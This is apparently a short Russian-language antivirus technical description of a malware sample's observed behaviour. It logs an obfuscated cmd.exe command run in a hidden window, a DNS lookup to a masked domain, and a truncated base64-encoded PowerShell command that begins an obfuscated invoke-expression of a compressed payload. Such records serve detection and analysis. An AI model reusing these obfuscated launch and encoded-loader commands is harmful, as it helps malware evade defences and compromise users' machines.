Техническая информация
- '<SYSTEM32>\cmd.exe' XiKRpBzdvwjGvW rZpBqwIAwsvKoXstcML OJTQEDbvwJwRDd & %^c^o^m^S^p^E^c^% %^c^o^m^S^p^E^c^% /V /c set %PziiBOBJVzFppYE%=iiLKcPVklthl&&set %qIwlWNz%=p&&set %FwnOdkskR%=...
- DNS ASK gq###e1z2x1.com
- '<SYSTEM32>\cmd.exe' XiKRpBzdvwjGvW rZpBqwIAwsvKoXstcML OJTQEDbvwJwRDd & %^c^o^m^S^p^E^c^% %^c^o^m^S^p^E^c^% /V /c set %PziiBOBJVzFppYE%=iiLKcPVklthl&&set %qIwlWNz%=p&&set %FwnOdkskR%=...' (со скрытым окном)
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e IAAuACgAIAAkAFAAcwBIAE8AbQBlAFsAMgAxAF0AKwAkAFAAUwBIAG8ATQBFAFsAMwA0AF0AKwAnAHgAJwApACAAKAAgAG4AZQBXAC0AbwBCAGoAZQBjAFQAIAAgAFMAeQBTAHQARQBNAC4AaQBPAC4AYwBvAG0AUAByAEUAUwBTAGkAbwBuAC4AZABlAG...